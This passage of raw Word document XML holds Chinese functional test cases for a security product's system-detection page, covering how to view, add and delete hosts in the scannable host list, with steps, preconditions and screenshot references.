                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>系统检测功能相关组件全部开启，病毒库更新到最新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1E4246CF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B6A7737"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0E6C4004" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击左侧导航栏中的“系统检测”标签，进入系统检测页面；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69E0946B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>页面中展示出可扫描的主机列表，以及对列表中主机的相关操作。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67AACB33"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="769C747E" wp14:editId="6B2E035A">
                  <wp:extent cx="4104005" cy="1871980"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="7620"/>
                  <wp:docPr id="546" name="图片 546" descr="C:\Users\PC-2\AppData\Local\Temp\15294839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PC-2\AppData\Local\Temp\1529483992(1).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4104005" cy="1871980"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4973580F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FA34086"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64EF3FE6"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进入系统检测页面时</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>显示</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>可扫描的主机列表。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="53804A17" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69061ACD"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2A3F2522" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BA72BCB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="389" w:name="_Toc36487976"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新增主机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="389"/>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5E39EBD4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="574809F9"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01B37FC9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>新增主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1AC54D4C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F190B7E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EDACBB3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>新增一个主机到可扫描的主机列表中</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="26A7F436" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E332A16"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2BE260CA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>系统检测功能相关组件全部开启，病毒库更新到最新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="08D930D0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14507265"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6D4137B3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>进入系统检测页面；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A02B1E7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击主机列表上方的“新增”按钮；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="546FF011" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F437E04" wp14:editId="3B465611">
                  <wp:extent cx="4175760" cy="2707640"/>
                  <wp:effectExtent l="0" t="0" r="15240" b="1016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175760" cy="2707640"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="65598D79" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>填写主机信息；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="379537DE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14609243" wp14:editId="57D7BDC6">
                  <wp:extent cx="2780665" cy="2542540"/>
                  <wp:effectExtent l="0" t="0" r="13335" b="2286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3">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:srcRect l="18195" t="16699" r="14899" b="4073"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2780986" cy="2542786"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="728D227A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击“连接测试”按钮；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B709291" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>“测试连接成功”弹窗的</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>确认按钮；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18B37C0D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A983FEE" wp14:editId="0DD94FA0">
                  <wp:extent cx="4104005" cy="2891155"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="4445"/>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4104005" cy="2891155"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="38AABB1E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>弹窗右</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>下角的确认按钮；</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4E066C3F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F3256E9"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193CD6BA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>新增一个主机</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，成功显示在主机列表中。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="55B7EA70" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67737C15"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546C319B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BA9B072" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="390" w:name="_Toc36487977"/>
      <w:r w:rsidRPr="00536672">
        <w:t>删除主机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="390"/>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14B1BA7B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07E2AC28"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1DF32A7D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>删除主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="251821FE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="014BB596"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5081F81C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>从主机列表中删除</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>一个主机</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4D4A1B74" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29DCC7B8"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15E6AB66" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>系统检测功能相关组件全部开启，病毒库更新到最新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0F47E26B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F0C2235"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7F8928C3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>进入系统检测页面；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BEDB50E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击列表左侧复选框，选中主机列表中一个主机；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7947A96F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击主机列表上方的“删除”按钮；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D3BEEE0"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64D06F82" wp14:editId="2B52CBE2">
                  <wp:extent cx="4104005" cy="2680970"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="11430"/>
